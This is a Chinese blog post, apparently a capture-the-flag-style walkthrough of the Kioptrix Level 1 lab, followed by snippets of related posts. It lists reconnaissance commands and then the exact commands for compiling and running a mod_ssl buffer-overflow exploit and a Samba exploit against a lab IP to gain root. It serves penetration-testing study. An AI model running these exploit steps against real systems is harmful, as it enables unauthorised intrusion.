Kioptrix Level 1靶机

于 2025-02-19 17:45:48 发布
阅读量285 收藏 7
点赞数 5
CC 4.0 BY-SA版权
分类专栏: OSCP靶机 文章标签: 安全 网络安全 系统安全 web安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/godfish44/article/details/145734906

Kioptrix Level 1靶机

一、信息搜集

1、主机探测

nmap -sP 192.168.189.142/24 -T5

扫描到靶机ip192.168.189.150

2、端口服务扫描

nmap -sS -sV -p- 192.168.189.150 -T5

开放了http服务,访问后没有什么可利用的信息,目录扫描到一些配置文件目录,没有什么有用信息

在这里插入图片描述
在这里插入图片描述

3、目录爆破

dirb http://192.168.189.148/

在这里插入图片描述

4、漏洞工具扫描

用nikto扫描可能的漏洞

nikto -h 192.168.189.150

发现了当前版本的mod_ssl可能存在缓冲区溢出导致的远程shell,我们就可以查找相应的exp了:采用2002-07-30这个版本

在这里插入图片描述

二、漏洞利用

1、源码编译

下载源码后编译,

gcc -o OpenFuck 47080.c -lcrypto -DOPENSSL_API_COMPAT=0x10100000L -lssl

在这里插入图片描述

编译时高版本gcc可能不兼容,需要加入参数向后兼容:-DOPENSSL_API_COMPAT=0x10100000L -lssl

运行攻击程序:

提示需要我们提供相应的参数,目标的版本,目标主机ip,端口,连接的数量

在这里插入图片描述

通过刚刚nmap扫描发现了,版本为Red-Hat Apache 1.3.20

在这里插入图片描述

筛选一下对应版本:

./OpenFuck | grep 1.3.20

在这里插入图片描述

0x6a 0x6b都符合版本要求,尝试后发现0x6b可以使用,我们直接攻击:

./OpenFuck 0x6b 192.168.189.150 -c 50

成功拿到shell:

在这里插入图片描述

三、权限提升

尝试内核提权但是没有成功

我们用msf对Samba套件进行版本扫描:

msfconsole
search smb_version

use 0
set RHOST 192.168.189.150
run

检测到samba版本为2.2.1a

在这里插入图片描述

searchsploit samba 2.2.1

在这里插入图片描述

使用编号10的exp:

searchsploit -m 10
gcc -o kill 10.c
./kill -b 0 192.168.189.150

在这里插入图片描述
在这里插入图片描述

提权成功!

[!CAUTION]

1、nmap扫描不出samba的版本,要用msf的smb_version 才能扫描出

957475179)][外链图片转存中…(img-TLYBh0sR-1739957475179)]

提权成功!

[!CAUTION]

1、nmap扫描不出samba的版本,要用msf的smb_version 才能扫描出

2、前期各种方法拿到的shell大多都是兔子洞没法提权,真正提权是利用Samba的缓冲区溢出

KIOPTRIX: LEVEL 1 (#1)
logan_logan的博客
12-19 573
KIOPTRIX: LEVEL 1 (#1) 1.浏览器输入地址打开,是一个Test page网页,接下来开始进行信息收集; 2.信息收集 2.1 使用namp工具对端口进行扫描 发现apache的版本较老,同时开了samba服务,接下来考虑对这两个信息进行更深入的验证。 2.2 使用gobuster枚举目录 对扫描的目录进行验证之后发现没有多少有用信息; 3.漏洞探测 3.1 apache漏洞探测 在kali里面搜索漏洞,接下来开始进行尝试 3.2 samba漏洞探测 使用msf探测到samba版
【vulnhub——Kioptrix Level 1靶机
jieli0901227的博客
05-26 738
找到samba 版本信息,通过https://www.exploit-db.com/ 漏洞利用库 查找这个版本有个远程代码执行漏洞,我们试试。Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。下载的文件解压后,编辑 Kioptix Level 1.vmx 文件,删除以 ethernet0开头的行,并保存,发现 MRTG 2.9.6 可能是个应用, 搜索版本可能存在的漏洞,,没有可利用的信息。那么我们尝试这个版本漏洞搜索。
Kioptrix Level 1(#1)
MD@@nr丫卡uer
12-08 553
Kioptrix Level 1(#1) 目标:Kioptrix Level 1(VMware) 攻击机:kali(192.168.43.80) 网关:192.168.43.255 #1查看Kioptrix在内网的ip地址 nmap 192.168.43.0/24 -n -sP -sn -n 不做DNS解析 -sP ping扫描 -sn 不做端口扫描 得到ip192.168.43.36 #2查看端口开放情况(nmap) nmap 192.168.43.36 -O -sS -sV -O
Vulnhub靶机渗透-Kioptrix_Level_1
XYZCG的博客
12-14 572
通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
kioptrix-level-1
热门推荐
cxyzupup的博客
01-10 1万+
kioptrix-level-1-1,22 项目地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22 提示:靶机网络连接方式使用NAT模式。 文章目录kioptrix-level-1-1,22一、信息收集1. 使用fping工具查找靶机IP:2. 使用nmap对目标主机端口进行枚举:二、信息利用1. 查看80端口:2. 查看443端口:总结 一、信息收集 1. 使用fping工具查找靶机IP: 命令如下: kali@kali:~/Desktop$ fp
Kioptrix Level 1 靶机wp
m0_52496313的博客
08-10 1180
Kioptrix Level 1 靶机wp
Kioptrix Level 1靶机检测不到IP地址 (determine ip info for eth0 failed)
Viv233的博客
01-29 2398
这里写自定义目录标题背景介绍失败的尝试我是怎么开窍了呢 背景介绍 我是一枚纯小白,艰难的自学OSCP中。。。今天跟着INE的视频启动 Kioptrix Level 1靶机后 发现用netdiscover 和nmap都扫不出靶机IP。 失败的尝试 开始搜怎么回事这是,找到了这样两篇类似帖子: https://blog.youkuaiyun.com/qq_41918771/article/details/1036...
Kioptrix Level 2 靶机wp
m0_52496313的博客
08-12 965
Kioptrix Level 2靶机wp
Kioptrix Level 4 靶机wp
m0_52496313的博客
08-16 499
Kioptrix Level 4 靶机wp
VulnHub——Kioptrix Level 1
江左盟的博客
04-18 692
简介 信息收集 使用fping -agq 192.168.204.0/24探测局域网内其它主机,发现存在其它3台主机,如图: 使用nmap --min-rate 10000 -T5 192.168.0.102 192.168.0.100 192.168.0.126快速扫描这三台主机,发现只有一台是VMware,且开启了22,80,111,139,443和1024端口,如图: ...
oscp——Kioptrix: Level 1 (#1)
王嘟嘟的博客
01-31 1163
0x00 前言 这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下 链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 0x01 信息收集 1.IP 2.端口 0x02 攻击 1.端口 这里可以看到80端口开放了OpenSSL 使用nikto进行扫描(我记得oscp考试貌似不让使用工具) nikto -host 192....
vulnhub Kioptrix: Level 1 (#1)
箭雨镜屋
11-16 1792
本文使用的方法是利用apache mod_ssl 2.8.4的Remote Buffer Overflow漏洞(CVE-2002-0082)getshell并拿到root权限
vulnhub靶场 Kioptrix-level-1
qq_69775412的博客
10-08 758
简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
Kioptrix Level 1
底层社会中的弱智
04-16 503
获取局域网中目标靶机IP 192.168.11.137为目标IP
vulhub——Kioptrix: Level 1 (#1)
战神/calmness的博客
06-04 351
下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 目标地址:192.168.243.37 攻击地址:192.168.18.148 目录 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 信息收集 MSF 建立连接 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh..
Vulnhub-靶机-Kioptrix: Level 1 (#1)
qq_43264813的博客
01-28 733
Vulnhub—靶机Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.4
【Vulnhub通关】KioptrixLevel 1 (#1)
icewolf00的博客
01-24 1392
注意:本文转载自本人稀土掘金博客。
渗透日记————Kioptrix Level 1
m0_73700261的博客
04-09 475
扫描端口发现有以下端口开放其中比较重要的有三个端口开放80 22 和139端口。接着使用msf查看版本漏洞接着搜索看看有没有对应的漏洞。sumba端口是Linux系统上的一个免费软件。接着设置攻击靶机ip和对应的payload。cd进入根目录ls一下发现可以成功命令执行。发现靶机ip为:10.102.8.194。是用来为局域网内为不同计算机提供共享服务。发现该sambe服务器为2.2.1a。那么第一步先扫描发现靶机的地址。139端口是一个sumba端口。接着继续搜索历史漏洞。
Kioptrix4_靶机渗透环境部署
最新发布
01-09
### 部署 Kioptrix4 渗透测试靶机环境 #### 准备工作 为了成功部署 Kioptrix4 渗透测试靶机,需准备虚拟化软件 VMware 或 VirtualBox。确保已安装 Kali Linux 作为攻击平台,其 IP 地址设置为 `192.168.10.19`[^1]。 #### 下载 Kioptrix4 访问官方提供的下载链接获取 Kioptrix4 的镜像文件。该文件位于指定的下载页面[^4]: ```plaintext https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar ``` #### 安装配置 完成下载后,在 VMware 中创建新的虚拟机实例,并导入解压后的 `.vmdk` 文件。启动新创建的虚拟机前,建议调整硬件资源分配,如内存大小和处理器核心数,以优化性能表现。 #### 网络设置 进入虚拟机网络适配器选项卡,选择 NAT 模式或仅主机模式来隔离外部网络连接,防止潜在风险扩散至真实环境中。确认虚拟机能够正常联网以便后续操作顺利开展。 #### 初始状态观察 初次开机时记录下默认显示的信息界面,这有助于理解当前系统的初始状况以及可能存在的安全提示。由于缺乏预设登录凭证,接下来的操作将依赖于外部工具辅助分析与突破[^2]。 #### 开展初步侦察 借助 Kali Linux 提供的各种开源情报收集工具集,针对刚启动的目标 VM 进行基础扫描,识别开放端口和服务版本等基本信息。此过程旨在发现可利用的安全弱点,从而规划下一步行动方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值